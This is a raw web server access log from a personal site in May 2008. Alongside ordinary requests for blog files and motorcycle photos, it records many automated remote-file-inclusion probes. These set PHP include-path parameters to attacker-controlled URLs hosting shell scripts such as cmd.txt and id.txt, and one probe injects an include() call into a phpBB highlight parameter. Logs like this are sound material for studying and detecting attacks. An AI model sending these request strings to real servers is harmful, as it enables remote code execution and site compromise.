213.246.51.45 - - [05/May/2008:11:45:11 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:11:45:12 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [05/May/2008:11:45:34 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [05/May/2008:11:45:34 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.121.93.156 - - [05/May/2008:11:45:39 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.121.93.156 - - [05/May/2008:11:45:40 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
194.121.93.156 - - [05/May/2008:11:46:14 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 1179648 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
194.121.93.156 - - [05/May/2008:11:46:14 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 1769472 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
195.155.232.37 - - [05/May/2008:11:46:17 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:46:45 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:46:52 -0700] "GET /index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:46:53 -0700] "GET /logs/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:11:46:54 -0700] "GET /logs/access.log/account.php?action=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.184.242.48 - - [05/May/2008:11:48:07 -0700] "GET /logs/access_080219.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.184.242.48 - - [05/May/2008:11:48:12 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.184.242.48 - - [05/May/2008:11:48:19 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:49:08 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:49:08 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:49:32 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:49:39 -0700] "GET /index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:49:40 -0700] "GET /logs/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.102.61.162 - - [05/May/2008:11:49:56 -0700] "GET /logs/access.log HTTP/1.0" 200 379110 "-" "qareilcgnahkgl3vd jwefa" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:50:15 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:11:50:40 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [05/May/2008:11:51:13 -0700] "GET /?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:23 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:23 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:23 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:23 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:24 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:27 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:27 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:29 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:29 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:29 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:30 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:30 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:30 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
67.9.124.105 - - [05/May/2008:11:51:31 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:11:53:09 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.4.3 - - [05/May/2008:11:53:13 -0700] "GET /logs/access_080219.log/extras/ext_cats.php?dir_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [05/May/2008:11:53:13 -0700] "GET /extras/ext_cats.php?dir_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [05/May/2008:11:53:13 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:11:53:18 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:11:53:18 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.167.194.105 - - [05/May/2008:11:53:27 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [05/May/2008:11:53:27 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [05/May/2008:11:53:28 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:53:36 -0700] "GET /logs/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:53:42 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:53:42 -0700] "GET /phphtml.php?htmlclass_path=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:53:42 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:53:42 -0700] "GET /index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:53:58 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:54:27 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:11:54:51 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:55:10 -0700] "GET /logs/access_080311.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:55:10 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:55:10 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:55:45 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:55:46 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:55:46 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:55:48 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:55:48 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:55:49 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:55:49 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:55:50 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:55:50 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:55:51 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:11:55:51 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:55:52 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.179.18 - - [05/May/2008:11:55:55 -0700] "GET /samPHPweb/common/db.php?commonpath=http://www.witherick.com/copper/lang/COPYRIGHT.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.55.179.18 - - [05/May/2008:11:55:55 -0700] "GET /logs/samPHPweb/common/db.php?commonpath=http://www.witherick.com/copper/lang/COPYRIGHT.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:55:58 -0700] "GET /logs/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:55:59 -0700] "GET /index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
195.155.232.37 - - [05/May/2008:11:56:06 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:56:41 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:56:58 -0700] "GET /logs/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:57:04 -0700] "GET /index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:11:57:36 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:11:57:37 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:11:57:37 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:58:03 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:58:13 -0700] "GET /logs/access_071225.log/index.php?page=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:58:21 -0700] "GET /logs/index.php?page=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:58:23 -0700] "GET /index.php?page=http://turque.org/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:58:33 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:11:59:11 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:11:59:55 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
